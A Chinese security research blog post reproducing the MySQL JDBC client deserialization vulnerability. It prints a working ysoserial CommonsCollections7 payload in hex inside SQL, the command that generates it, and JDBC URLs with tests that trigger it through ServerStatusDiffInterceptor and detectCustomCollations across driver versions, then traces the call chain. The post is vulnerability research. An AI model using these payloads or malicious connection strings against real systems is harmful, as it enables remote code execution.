Jdbc 碎碎念二：MySQL 反序列化

参考【1】中四哥已经讲的很全面也很详细了，简单记录下复现过程吧

MySQL 反序列化

autoDeserialize

如解释，mysql client会自动反序列化server端传回的BLOB类型

复现

手动触发

CREATE DATABASE IF NOT EXISTS test;
CREATE TABLE IF NOT EXISTS test.eviltable
(
	`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
	evil_2  blob,
	PRIMARY KEY (`id`)
);

set @obj=0xaced0005737200136a6176612e7574696c2e486173687461626c6513bb0f25214ae4b803000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000877080000000b000000027372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001700000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e00177371007e000f7571007e001400000002707571007e001400000000740006696e766f6b657571007e001700000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00147371007e000f757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000e746f756368202f746d702f636337740004657865637571007e00170000000171007e001c7371007e000a737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c77080000001000000001740002797971007e002f787871007e002f7371007e000271007e00077371007e00303f4000000000000c770800000010000000017400027a5a71007e002f78787371007e002d0000000278;
INSERT INTO test.eviltable(`evil_2`) VALUES (@obj);

其中@obj取值

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections7 "touch /tmp/cc7" | xxd -ps -c 200 | tr -d '\n'

触发代码

ResultSet rs = stmt.executeQuery("select evil_2 from eviltable limit 1;");
rs.next();
rs.getObject(1);

误区：想当然以为只要是BLOB类型的字段就会被自动反序列化，其实不然，需要满足以下两个条件

1. autoDeserialize 为True
2. 主动调用com.mysql.cj.jdbc.result.ResultSetImpl#getObject，进行反序列化

ServerStatusDiffInterceptor& detectCustomCollations触发调用链

手动触发场景下实际需要控制：

1. jdbc url，也就是evil mysql server
2. 代码需要getObject，这点显然不可能

那么需要找到利用链，解决触发getObject。可以看看四哥在参考【1】中总结的漏洞历史，总的来说有公开两种通用的利用方式

• ServerStatusDiffInterceptor
• detectCustomCollations

四哥和fnmsd的文章已经讲的很清楚了，这里直接引用他们的测试结果

ServerStatusDiffInterceptor

/**
 * ServerStatusDiffInterceptor触发
 */
// 8.x:jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
// 8.0.14 测试成功
@Test
public void ServerStatusDiffInterceptorTest8_x() throws Exception{
    String url = "jdbc:mysql://localhost:3307/?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor";
    Connection connection = DriverManager.getConnection(url, "cc7", "password");
}

// 6.x(属性名不同):jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
// 6.0.5 测试通过
@Test
public void ServerStatusDiffInterceptorTest6_x() throws Exception{
    Class.forName(JDBC_DRIVER);
    String url = "jdbc:mysql://localhost:3307/?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor";
    Connection connection = DriverManager.getConnection(url, "cc7", "password");
}

// 5.1.11及以上的5.x版本（包名没有了cj）:jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
// 5.1.19 测试成功
@Test
public void ServerStatusDiffInterceptorTest5_1_11TO5_x() throws Exception{
    Class.forName(JDBC_DRIVER);
    String url = "jdbc:mysql://localhost:3307/?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor";
    Connection connection = DriverManager.getConnection(url, "cc7", "password");
}

// 5.1.10及以下的5.1.X版本：同上，但是需要连接后执行查询。
// 5.1.10 测试成功
// @TODO:5.1.9 测试失败
@Test
public void ServerStatusDiffInterceptorTest5_xTO5_1_10() throws Exception{
    Class.forName(JDBC_DRIVER);
    String url = "jdbc:mysql://localhost:3307/?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor";
    Connection connection = DriverManager.getConnection(url, "cc7", "password");
    Statement stmt = connection.createStatement();
    ResultSet rs = stmt.executeQuery("select 1;");
}

// 5.0.x:还没有ServerStatusDiffInterceptor这个东西┓( ´∀` )┏

detectCustomCollations

/**
 * detectCustomCollations触发
 */

// 5.1.29-5.1.40:jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_JRE8u20_calc
// 5.1.29 测试通过
@Test
public void detectCustomCollationsTest5_1_29TO5_1_40() throws Exception{
    Class.forName(JDBC_DRIVER);
    String url = "jdbc:mysql://localhost:3307/?useSSL=false&autoDeserialize=true&detectCustomCollations=true";
    Connection connection = DriverManager.getConnection(url, "cc7", "password");
}

// 5.1.28-5.1.19：jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&user=yso_JRE8u20_calc
// 5.1.19 测试通过
@Test
public void detectCustomCollationsTest5_1_19TO5_1_28() throws Exception{
    Class.forName(JDBC_DRIVER);
    String url = "jdbc:mysql://localhost:3306/?useSSL=false&autoDeserialize=true";
    Connection connection = DriverManager.getConnection(url, "cc7", "password");
}

// 5.1.18以下的5.1.x版本：不可用
// 5.0.x版本不可用

思路分析

知其然更需知其所以然，下面尝试反向复现是如何发现这两个利用链的

autoDeserialize是源头，从autoDeserialize参数开始分析

1. autoDeserialize的调用情况

可以看到，如果字段类型是Binary或者BLOB，会进行反序列化，其中-84、-19为0xaced，java反序列化标志。

2. 反向追踪

ClientPreparedStatement.EmulatedPreparedStatementBindings
    getObject(int)
        2015 return this.bindingsAsRs.getObject(parameterIndex);

DatabaseMetaData.ResultSetIterator
    next()
        146 return this.resultSet.getObject(this.colIndex).toString();

ResultSetUtil
    resultSetToMap(Map, ResultSet)
        46 mappedValues.put(rs.getObject(1), rs.getObject(2));
    resultSetToMap(Map, ResultSet, int, int)
        53 mappedValues.put(rs.getObject(key), rs.getObject(value));

UpdatableResultSet
    syncUpdate()
        1141 this.updater.setObject(i + 1, getObject(i + 1), fields[i].getMysqlType());

• 2.1. ClientPreparedStatement.EmulatedPreparedStatementBindings

  PreparedStatement是预编译，还是只能在client 通过主动调用getObject触发，对利用无效

• 2.2. UpdatableResultSet

  UpdatableResultSet为更新Result，未找到利用点

2.3. DatabaseMetaData.ResultSetIterator

尝试了几个链，都不太实用

ConnectionImpl#setAutoCommit
	IterateBlock#doForAll
		DatabaseMetaData.IterateBlock#doForAll
			DatabaseMetaData.ResultSetIterator#next

失败，ResultSetIterator是protect类，无法通过Class.forName(className).newInstance()实例化

DatabaseMetaData#getTables/getCloumns等
	DatabaseMetaData#getCatalogIterator
		DatabaseMetaData.IterateBlock#doForAll
			DatabaseMetaData.ResultSetIterator#next

触发困难

ConnectionImpl#prepareCall
  CallableStatement#getInstance
    CallableStatement#CallableStatement
      CallableStatement#determineParameterTypes
        DatabaseMetaData#getProcedureColumns
          DatabaseMetaData#getProcedureOrFunctionColumns
            DatabaseMetaData#getProceduresAndOrFunctions
              DatabaseMetaData#getCatalogIterator
                DatabaseMetaData.IterateBlock#doForAll
                  DatabaseMetaData.ResultSetIterator#next

触发困难

2.4. ResultSetUtil

有利用点，反向追溯过程如下

调用链

ResultSetUtil#resultSetToMap

@SuppressWarnings({ "rawtypes", "unchecked" })
   public static void resultSetToMap(Map mappedValues, ResultSet rs) throws SQLException {
       while (rs.next()) {
           mappedValues.put(rs.getObject(1), rs.getObject(2));
       }
   }

   @SuppressWarnings({ "rawtypes", "unchecked" })
   public static void resultSetToMap(Map mappedValues, java.sql.ResultSet rs, int key, int value) throws SQLException {
       while (rs.next()) {
           mappedValues.put(rs.getObject(key), rs.getObject(value));
       }
   }

ServerStatusDiffInterceptor#populateMapWithSessionStatusValues

private void populateMapWithSessionStatusValues(Map<String, String> toPopulate) {
    java.sql.Statement stmt = null;
    java.sql.ResultSet rs = null;

    try {
        try {
            toPopulate.clear();

            stmt = this.connection.createStatement();
            rs = stmt.executeQuery("SHOW SESSION STATUS");
            ResultSetUtil.resultSetToMap(toPopulate, rs);
        } finally {

此处了执行sql:SHOW SESSION STATUS

• evil mysql server可控情况下，可以返回可控的sql结果，从而触发后续的反序列化
• 如何触发populateMapWithSessionStatusValues，继续跟踪

发现ServerStatusDiffInterceptor#postProcess和#preProcess有两处调用

ServerStatusDiffInterceptor
    postProcess(Supplier<String>, Query, T, ServerSession)
        69 populateMapWithSessionStatusValues(this.postExecuteValues);
    preProcess(Supplier<String>, Query)
        105 populateMapWithSessionStatusValues(this.preExecuteValues);

到这里和结果已经很接近了

1. 假如了解jdbc mysql 的参数，知道有个参数queryInterceptors，那对应起来很快就知道答案了
2. 但是我是不了解的，只能苦逼的继续跟踪了

NoSubInterceptorWrapper#preProcess

public <T extends Resultset> T preProcess(Supplier<String> sql, Query interceptedQuery) {
    this.underlyingInterceptor.preProcess(sql, interceptedQuery);
}

NativeProtocol#invokeQueryInterceptorsPre

public <T extends Resultset> T invokeQueryInterceptorsPre(Supplier<String> sql, Query interceptedQuery, boolean forceExecute) {
...
                T interceptedResultSet = interceptor.preProcess(sql, interceptedQuery);

NativeProtocol#sendQueryPacket

public final <T extends Resultset> T sendQueryPacket(Query callingQuery, NativePacketPayload queryPacket, int maxRows, boolean streamResults,
...
            if (this.queryInterceptors != null) {
                T interceptedResults = invokeQueryInterceptorsPre(query, callingQuery, false);

NativeSession#execSQL

public <T extends Resultset> T execSQL(Query callingQuery, String query, int maxRows, NativePacketPayload packet, boolean streamResults,
...
        try {
            if (packet == null) {
                String encoding = this.characterEncoding.getValue();
                return ((NativeProtocol) this.protocol).sendQueryString(callingQuery, query, encoding, maxRows, streamResults, catalog, cachedMetadata,
                        this::getProfilerEventHandlerInstanceFunction, resultSetFactory);
            }
            return ((NativeProtocol) this.protocol).sendQueryPacket(callingQuery, packet, maxRows, streamResults, catalog, cachedMetadata,
                    this::getProfilerEventHandlerInstanceFunction, resultSetFactory);

ConnectionImpl#setAutoCommit

@Override
public void setAutoCommit(final boolean autoCommitFlag) throws SQLException {
...
                    this.session.execSQL(null, autoCommitFlag ? "SET autocommit=1" : "SET autocommit=0", -1, null, false, this.nullStatementResultSetFactory,
                            this.database, null, false);

抓包看过mysql协议的都清楚，login之后，client和server会沟通一些参数，其中就有autocommit，所以链路径上是没问题了，需要解决的是链上的诸多条件

queryInterceptors的初始化

其中重点是queryInterceptors取值问题，最开始出现在NativeProtocol#sendQueryPacket

public <T extends Resultset> T invokeQueryInterceptorsPre(Supplier<String> sql, Query interceptedQuery, boolean forceExecute) {
    T previousResultSet = null;

    for (int i = 0, s = this.queryInterceptors.size(); i < s; i++) {
        QueryInterceptor interceptor = this.queryInterceptors.get(i);

        boolean executeTopLevelOnly = interceptor.executeTopLevelOnly();
        boolean shouldExecute = (executeTopLevelOnly && (this.statementExecutionDepth == 1 || forceExecute)) || (!executeTopLevelOnly);

        if (shouldExecute) {
            T interceptedResultSet = interceptor.preProcess(sql, interceptedQuery);

追溯发现

NativeProtocol#queryInterceptors
NativeSession#queryInterceptors
ConnectionImpl#queryInterceptors

最终定位是在initializeSafeQueryInterceptors进行的初始化

ConnectionImpl#initializeSafeQueryInterceptors

public void initializeSafeQueryInterceptors() throws SQLException {
	this.queryInterceptors = Util
                .<QueryInterceptor> loadClasses(this.propertySet.getStringProperty(PropertyKey.queryInterceptors).getStringValue(),
                        "MysqlIo.BadQueryInterceptor", getExceptionInterceptor())
                .stream().map(o -> new NoSubInterceptorWrapper(o.init(this, this.props, this.session.getLog()))).collect(Collectors.toList());
    }

而PropertyKey，可以通过jdbc url参数进行指定，问题解决。

小结

本节在老师傅们的文档基础上，手动复现了jdbc mysql connector 8.0.14 cc7的反序列化，以及不同版本在ServerStatusDiffInterceptor和detectCustomCollations 两种方式的反序列化复现，没有什么新的东西。

求渔得渔，后半部分试着反向去挖掘jdbc mysql反序列化的利用链，在8.0.14版本上发现了几个鸡肋的链，最终发现ServerStatusDiffInterceptor链，过程虽然稍长，不过也算是最大的收获。

老样子，抛几个问题

1. 在反向找链的时候，发现本地还有一些类调用了ResultSetUtil.getObject，会不会有新的利用链
2. Binary类型也有同样的问题，测试下？
3. 目前看来autoDeserialize是强特征，好像没绕过这个特征姿势了

参考

• [1] MySQL JDBC 客户端反序列化漏洞（四哥）
• [2] MySQL JDBC 客户端反序列化漏洞分析（fnmsd@360）
• [3] MySQL JDBC 反序列化分析（7tem7）